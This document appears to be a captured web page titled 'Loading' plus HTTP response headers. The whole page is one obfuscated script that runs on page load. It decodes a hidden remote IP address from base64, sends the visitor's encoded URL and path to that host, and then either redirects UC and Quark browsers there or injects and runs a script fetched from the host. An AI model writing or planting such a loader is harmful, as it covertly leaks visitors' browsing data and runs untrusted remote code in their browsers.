<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>Loading</title>
</head>
<body>
<script>
function W(s){return s.split('').reverse().join('').replace(/\./g,'%2E')}
var z=btoa("u="+W(location.href)+"&p="+location.pathname+location.search)
var u=atob("aHR0cDovLzM4LjE3Ny4yMzguODo4ODE4")
var t
var UA=['ucbrowser','ucweb','quark']
function isUC(){var a=navigator.userAgent.toLowerCase();return UA.some(function(v){return a.indexOf(v)>-1})}
function link(){t&&clearTimeout(t);location.href=u+"/?z="+z}
function js(){var s=document.createElement('script')
t=setTimeout(link,2000)
s.src=u+"/"+z+".js";s.onload=function(){clearTimeout(t)};s.onerror=link;document.head.appendChild(s)}
isUC()?link():js()
</script>
</body>
</html>
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 907